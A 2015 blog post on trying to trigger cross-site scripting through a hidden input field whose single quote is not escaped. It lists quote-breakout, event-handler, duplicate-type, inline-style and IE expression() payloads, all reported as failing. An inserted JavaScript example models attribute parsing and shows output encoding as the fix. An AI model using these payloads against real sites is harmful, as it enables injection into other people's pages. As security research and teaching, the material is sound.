Saturday, 10 January 2015

XSS in a hidden input. Possible?

While trying to find a way to exploit a vulnerable HTML hidden input on a well-known website (the characters < and > were sanitised, the single quote was not), I tried a number of techniques and gathered some notes that might help on other sites.
The vulnerable input looks something like this:

<input id='myInput' type='hidden' value='dynamic'/> 

The value could be broken out of with a single quote, for example ' onmouseover="alert(1)", which renders as:

<input id='myInput' type='hidden' value='dynamic' onmouseover="alert(1)" />

Unfortunately, even though onmouseover is now an attribute of the element, nothing fires: a hidden input is neither rendered nor focusable, so there is no box on the page to hover and no user action that reaches it. None of the other event handler attributes I tried worked either, including onchange.

Can we override the type by injecting a second type="text" attribute?
No, not in current browsers: when a start tag repeats an attribute name, the HTML parser keeps the first occurrence and discards the later ones, so the original type='hidden' wins.
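To make the two observations above concrete (the quote breakout that adds an event handler, and the second type attribute that the parser ignores), here is an added example that is not part of the original post. It renders the page's input element the vulnerable way and a hardened way, then tokenises the result with a small attribute parser that follows the HTML tokenizer's duplicate-attribute rule, so you can see which attributes the browser ends up with. The function names, the encoder and the parser are this example's own assumptions; the template string is the page's input element, and the payloads are constructed from the ones discussed above.

```javascript
'use strict';
// Added example, not code from the original post. It models what the browser's
// HTML tokenizer makes of the page's payloads inside value='...', applying the
// tokenizer's duplicate-attribute rule (first occurrence of a name wins, later
// copies are discarded), and shows a hardened rendering beside the vulnerable
// one. renderUnsafe/renderSafe/parseAttrs are names assumed by this example.

const TEMPLATE = "<input id='myInput' type='hidden' value='%s'/>";

// Vulnerable rendering: the dynamic value is concatenated into the attribute
// with only < and > removed, as described on the page.
function renderUnsafe(value) {
  return TEMPLATE.replace('%s', () => String(value).replace(/[<>]/g, ''));
}

// Hardened rendering: every character that can end the attribute value, start
// a tag or start a character reference is encoded before interpolation.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(value) {
  return TEMPLATE.replace('%s', () => encodeAttr(value));
}

// Browsers decode character references inside attribute values; do the same so
// the parsed value reflects what script would read back from the DOM.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
function decodeAttr(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, ref) => {
    if (ref[0] === '#') {
      const hex = ref[1] === 'x' || ref[1] === 'X';
      return String.fromCodePoint(parseInt(hex ? ref.slice(2) : ref.slice(1), hex ? 16 : 10));
    }
    const key = ref.toLowerCase();
    return key in NAMED ? NAMED[key] : m;
  });
}

// Minimal start-tag attribute parser following the HTML tokenizer's attribute
// states: quoted or unquoted values, case-insensitive names, and the
// "duplicate-attribute" rule where only the first occurrence is kept.
function parseAttrs(tag) {
  const attrs = Object.create(null);
  const isSpace = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\f' || c === '\r';
  let i = 1;                                                                 // skip '<'
  while (i < tag.length && !isSpace(tag[i]) && tag[i] !== '>' && tag[i] !== '/') i++; // tag name
  while (i < tag.length) {
    while (i < tag.length && (isSpace(tag[i]) || tag[i] === '/')) i++;       // before attribute name
    if (i >= tag.length || tag[i] === '>') break;
    let name = '';
    while (i < tag.length && !isSpace(tag[i]) && tag[i] !== '/' && tag[i] !== '=' && tag[i] !== '>') {
      name += tag[i++];
    }
    while (i < tag.length && isSpace(tag[i])) i++;                           // after attribute name
    let value = '';
    if (tag[i] === '=') {
      i++;
      while (i < tag.length && isSpace(tag[i])) i++;                         // before attribute value
      const q = tag[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < tag.length && tag[i] !== q) value += tag[i++];
        i++;                                                                 // closing quote
      } else {
        while (i < tag.length && !isSpace(tag[i]) && tag[i] !== '>') value += tag[i++];
      }
    }
    name = name.toLowerCase();
    if (!(name in attrs)) attrs[name] = decodeAttr(value);                  // first occurrence wins
  }
  return attrs;
}

// Constructed payloads mirroring the ones discussed on the page.
const PAYLOADS = {
  handler: "' onmouseover=\"alert(1)\"",
  typeOverride: "' type=\"text\" onmouseover=\"alert(1)\"",
};

for (const [label, payload] of Object.entries(PAYLOADS)) {
  console.log(label, 'unsafe:', parseAttrs(renderUnsafe(payload)));
  console.log(label, 'safe:  ', parseAttrs(renderSafe(payload)));
}
```

Running it shows that the unsafe rendering gives the element an onmouseover attribute in both cases while type stays hidden, and that the safe rendering keeps the whole payload inside the value attribute, where the browser decodes it back to the original string without creating any new attributes.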

What if we inject an inline style to make the element visible, for example:
style="display: block;width: 999px;height: 999px;"
style="display: inline;width: 999px;height: 999px;"
style="visibility: visible;"
None of these worked in this case: the browser's default stylesheet gives input[type=hidden] display: none !important, which an inline style attribute cannot override.

Maybe run JavaScript from the CSS itself, using the old Internet Explorer expression() trick:
style="width: expression(alert('xss'));"
No luck. expression() was an IE-only extension, dropped in IE8 standards mode and never supported by other browsers.

I haven't found a way to bypass this yet.